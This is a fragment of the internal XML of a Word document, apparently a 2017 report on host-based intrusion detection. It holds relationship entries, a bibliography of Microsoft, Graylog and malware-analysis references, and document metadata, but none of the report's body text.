    <w:div w:id="2008555678">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2014721228">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2031905726">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2057731084">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2060206025">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2066947259">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2107117614">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2120296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gif"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.gif"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.graylog.org/en/2.2/pages/collector_sidecar.html"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0.png"/><Relationship Id="rId55"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technet.microsoft.com/en-us/library/cc750583.aspx" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.graylog.org/en/2.2/pages/collector_sidecar.html" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.graylog.org/en/2.2/pages/dashboards.html" TargetMode="External"/><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technet.microsoft.com/en-us/library/cc750583.aspx" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.graylog.org/en/2.2/pages/architecture.html" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:username@yourMachine.com" TargetMode="External"/><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support.microsoft.com/en-us/help/256986/windows-registry-information-for-advanced-users" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.graylog.org/en/2.2/pages/streams.html" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId53"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technet.microsoft.com/en-us/library/cc750583.aspx" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/help/256986/windows-registry-information-for-advanced-users" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.graylog.org/en/2.2/pages/architecture.html" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/windows/desktop/ms724892(v=vs.85).aspx" TargetMode="External"/><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technet.microsoft.com/en-us/library/cc750583.aspx" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.graylog.org/en/2.2/pages/collector_sidecar.html" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId52"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yperlink" Target="https://technet.microsoft.com/en-us/library/cc750583.aspx" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/881d8b23-d274-4313-a666-88f80c2cfd92.aspx" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/></Relationships>
</file>

<file path=word/_rels/footer4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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Registry</b:Tag>
    <b:SourceType>ArticleInAPeriodical</b:SourceType>
    <b:Guid>{04D32E5D-BED6-4F77-A1E3-ADFAC07963E3}</b:Guid>
    <b:LCID>en-US</b:LCID>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Grimes</b:Last>
            <b:First>Roger</b:First>
            <b:Middle>A.</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Infected with malware? Check your Windows registry</b:Title>
    <b:PeriodicalTitle>InfoWorld</b:PeriodicalTitle>
    <b:Year>2015</b:Year>
    <b:Month>March</b:Month>
    <b:Day>10</b:Day>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Service</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{A37CC9DA-6ACE-4978-B437-B93686390BF5}</b:Guid>
    <b:Title>Introduction to Windows Service Applications</b:Title>
    <b:InternetSiteTitle>Microsoft Developter Network</b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/d56de412(v=vs.110).aspx</b:URL>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Developers</b:Last>
            <b:First>Microsoft</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Fre08</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{E76BF129-C002-4972-A38B-28839E8D81A5}</b:Guid>
    <b:Title>OSSEC Open Source Security</b:Title>
    <b:Year>Fall 2008</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Freemon</b:Last>
            <b:First>Mike</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Publisher>CSC570G Linux Implementation/Administration Practicum</b:Publisher>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Nel14</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{E8C770FC-CBBA-4791-A578-350D71EC481E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Nel</b:Last>
            <b:First>Martinus</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Khiabani</b:Last>
            <b:First>Hamed</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>SAMHAIN: Host Based Intrusion Detection via File Integrity Monitoring</b:Title>
    <b:Year>2014</b:Year>
    <b:Publisher>SANS Institute</b:Publisher>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic1</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{BAE88519-F338-4C79-A5B1-3662003D5389}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Microsoft</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Structure of the Registry</b:Title>
    <b:InternetSiteTitle>Windows Dev Center</b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/windows/desktop/ms724946(v=vs.85).aspx</b:URL>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MSD</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{0036B71D-A96A-4CD5-B20D-A88475F6C57A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>MSDN</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Remote Procedure Call</b:Title>
    <b:InternetSiteTitle>Windows Dev Center </b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/windows/desktop/aa378651(v=vs.85).aspx</b:URL>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MSD1</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{394A47CC-1BAC-452D-9CDA-EC4FD0CBDB61}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Microsoft</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>How RPC Works</b:Title>
    <b:InternetSiteTitle>Windows Dev Center </b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/windows/desktop/aa373935(v=vs.85).aspx</b:URL>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic03</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{527CD71A-D538-48EB-82A7-6F8436B6CE6A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Microsoft</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>How Access Tokens Work</b:Title>
    <b:InternetSiteTitle>Microsoft Technet </b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:Year>2003</b:Year>
    <b:Month>March</b:Month>
    <b:Day>28</b:Day>
    <b:URL>https://technet.microsoft.com/en-us/library/cc783557(v=ws.10).aspx</b:URL>
    <b:RefOrder>15</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Tec05</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{AFABC29E-2DB6-40CE-A653-DA664F842D00}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>TechNet</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Understanding Windows Services Architecture</b:Title>
    <b:InternetSiteTitle>Microsoft Technet </b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:Year>2005</b:Year>
    <b:Month>May</b:Month>
    <b:Day>23</b:Day>
    <b:URL>https://technet.microsoft.com/en-us/library/881d8b23-d274-4313-a666-88f80c2cfd92.aspx</b:URL>
    <b:RefOrder>14</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{6FCD379B-09FF-4F02-9F7D-361581775306}</b:Guid>
    <b:Title>About Services</b:Title>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>MSDN</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:InternetSiteTitle>Microsoft Developer Network </b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/windows/desktop/ms681921(v=vs.85).aspx</b:URL>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic97</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{B98F9A95-B9CD-482D-ADA0-6F1D540B69D0}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Russinovich</b:Last>
            <b:First>Mark</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Inside the Registry</b:Title>
    <b:InternetSiteTitle>Microsoft Technet</b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:Year>1997</b:Year>
    <b:Month>April</b:Month>
    <b:URL>https://technet.microsoft.com/en-us/library/cc750583.aspx</b:URL>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic2</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{D77777F7-71CC-41DC-A86E-51D847F549DB}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Microsoft</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Windows Kernel-Mode Configuration Manager</b:Title>
    <b:InternetSiteTitle>Hardware Dev Center</b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/windows/hardware/ff565712(v=vs.85).aspx</b:URL>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic14</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{1A7539F8-3CF5-491B-B13C-A66ED107A6E9}</b:Guid>
    <b:Title>The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory</b:Title>
    <b:Year>2014</b:Year>
    <b:Publisher>John Wiley &amp; Sons, Inc.</b:Publisher>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Ligh</b:Last>
            <b:First>Michael</b:First>
            <b:Middle>Hale</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Case</b:Last>
            <b:First>Andrew</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Levy</b:Last>
            <b:First>Jamie</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Walters</b:Last>
            <b:First>AAron</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:City>United States of America</b:City>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic3</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{4B14A17D-0E20-4C35-BDB4-109B4CF298BE}</b:Guid>
    <b:Title>The System Registry</b:Title>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Microsoft</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:InternetSiteTitle>Microsoft Developer Network </b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft Coporation </b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/ms970651.aspx</b:URL>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gra</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{97E1DF7C-6054-403B-A489-52752B29CEA0}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Team</b:Last>
            <b:First>Graylog</b:First>
            <b:Middle>Developer</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Processing Pipelines</b:Title>
    <b:InternetSiteTitle>Graylog Document</b:InternetSiteTitle>
    <b:ProductionCompany>Graylog, Inc</b:ProductionCompany>
    <b:URL>http://docs.graylog.org/en/2.2/pages/pipelines/pipelines.html</b:URL>
    <b:RefOrder>16</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gra1</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{37A879D6-4709-4721-987E-60B8DDD68F48}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Team</b:Last>
            <b:First>Graylog</b:First>
            <b:Middle>Developer</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Graylog Collector Sidecar</b:Title>
    <b:InternetSiteTitle>Graylog Document</b:InternetSiteTitle>
    <b:ProductionCompany>Graylog, Inc.</b:ProductionCompany>
    <b:URL>http://docs.graylog.org/en/2.2/pages/collector_sidecar.html</b:URL>
    <b:RefOrder>17</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gra2</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{FAEC098F-B945-41A3-AD63-D95F3FDE9620}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Team</b:Last>
            <b:First>Graylog</b:First>
            <b:Middle>Developer</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Streams</b:Title>
    <b:InternetSiteTitle>Graylog Document </b:InternetSiteTitle>
    <b:ProductionCompany>Graylog, Inc</b:ProductionCompany>
    <b:URL>http://docs.graylog.org/en/2.2/pages/streams.html</b:URL>
    <b:RefOrder>18</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gra3</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{DE02AA5A-491D-4CE1-A65A-392699B410D3}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Team</b:Last>
            <b:First>Graylog</b:First>
            <b:Middle>Developer</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Alerts</b:Title>
    <b:InternetSiteTitle>Graylog Document</b:InternetSiteTitle>
    <b:ProductionCompany>Graylog, Inc.</b:ProductionCompany>
    <b:URL>http://docs.graylog.org/en/2.2/pages/streams/alerts.html</b:URL>
    <b:RefOrder>19</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Lin</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{A22852ED-8732-49C1-B476-A0095600533B}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Developer</b:Last>
            <b:First>Linux</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>INOTIFY</b:Title>
    <b:InternetSiteTitle>Linux Programmer's Manual</b:InternetSiteTitle>
    <b:URL>http://man7.org/linux/man-pages/man7/inotify.7.html</b:URL>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sik12</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{67462DCC-87C1-4AA8-8667-2DE5D8CB3B52}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Sikorski</b:Last>
            <b:First>Michael</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Honig</b:Last>
            <b:First>Andrew</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software</b:Title>
    <b:Year>2012</b:Year>
    <b:StandardNumber>ISBN-10: 1-59327-290-1 / ISBN-13: 978-1-59327-290-6</b:StandardNumber>
    <b:City>San Francisco</b:City>
    <b:Publisher>William Pollock</b:Publisher>
    <b:RefOrder>20</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mar09</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{B3E6F094-9B22-415D-BDAF-66C45BA30CB6}</b:Guid>
    <b:Title>Pushing the Limits of Windows: Handles</b:Title>
    <b:Year>2009</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Russinovich</b:Last>
            <b:First>Mark</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:InternetSiteTitle>Microsoft Technet</b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft </b:ProductionCompany>
    <b:Month>September</b:Month>
    <b:Day>29</b:Day>
    <b:URL>https://blogs.technet.microsoft.com/markrussinovich/2009/09/29/pushing-the-limits-of-windows-handles/</b:URL>
    <b:RefOrder>21</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic4</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{9A6EF257-D4B8-45FC-AC2A-59FB4845EDC5}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Developer</b:Last>
            <b:First>Microsoft</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>NotifyServiceStatusChange function</b:Title>
    <b:InternetSiteTitle>Windows Developer Center</b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/windows/desktop/ms684276(v=vs.85).aspx</b:URL>
    <b:RefOrder>22</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic5</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{87832D26-3FE8-48E2-A037-922ACC6905FE}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Team</b:Last>
            <b:First>Microsoft</b:First>
            <b:Middle>Developer</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Asynchronous Procedure Calls</b:Title>
    <b:InternetSiteTitle>Microsoft Developer Center</b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/windows/desktop/ms681951(v=vs.85).aspx</b:URL>
    <b:RefOrder>23</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5822B1C4-455E-4994-8221-E36E69AE4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4384</TotalTime>
  <Pages>1</Pages>
  <Words>21661</Words>
  <Characters>123472</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1028</Lines>
  <Paragraphs>289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 Thien Hung</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Chau Thien Hung</cp:lastModifiedBy>
  <cp:revision>183</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-04-30T03:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-13T15:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>